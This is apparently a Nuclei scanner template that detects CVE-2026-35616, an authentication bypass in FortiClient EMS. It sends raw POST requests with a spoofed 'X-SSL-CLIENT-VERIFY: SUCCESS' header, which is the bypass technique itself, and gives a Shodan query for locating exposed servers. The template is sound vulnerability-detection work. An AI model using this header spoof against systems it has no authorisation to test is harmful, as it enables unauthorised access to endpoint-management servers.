FortiClient EMS - Authentication Bypass

id: CVE-2026-35616

info:
  name: FortiClient EMS - Authentication Bypass
  author: ritikchaddha
  severity: high
  description: |
    Detects whether Fortinet hotfix FG-IR-26-099 for CVE-2026-35616 is missing by comparing behavioral responses from a certificate-authenticated endpoint. The template sends X-SSL-CLIENT-VERIFY: SUCCESS without certificate material and checks whether this spoofed header changes server behavior.
  impact: |
    If spoofing X-SSL-CLIENT-VERIFY changes backend behavior, Apache is likely not stripping the header before Django, indicating the target is still vulnerable.
  remediation: |
    Apply Fortinet hotfix FG-IR-26-099 or upgrade to FortiClient EMS 7.4.7+.
  reference:
    - https://bishopfox.com/blog/api-authentication-bypass-in-forticlient-ems-7-4-5-7-4-6-cve-2026-35616
    - https://nvd.nist.gov/vuln/detail/CVE-2026-35616
  classification:
    cve-id: CVE-2026-35616
    epss-score: 0.43209
    epss-percentile: 0.9755
    cwe-id: CWE-284
  metadata:
    verified: true
    max-request: 2
    vendor: fortinet
    product: forticlient_ems
    shodan-query: http.favicon.hash:-800551065
  tags: cve,cve2026,fortinet,forticlient,ems,auth-bypass,kev,vkev

http:
  - raw:
      - |
        POST /api/v1/fabric_device_auth/fortigate/init HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 0

        f

      - |
        POST /api/v1/fabric_device_auth/fortigate/init HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 0
        X-SSL-CLIENT-VERIFY: SUCCESS

        f

    matchers:
      - type: dsl
        dsl:
          - "contains(tolower(body_1), 'certificate not found')"
          - "status_code_1 == 401 && status_code_2 == 500"
          - "(body_1 != body_2)"
        condition: and
# digest: 490a0046304402202020842f09e9346988027da8661fdbdf489ab94346bedd375e4fdfe61deaae5302203b281a7f09f77f26a6e6370814afd4700500a0ead4617601d7b1333bff823c74:922c64590222798bb761d5b6d8e72950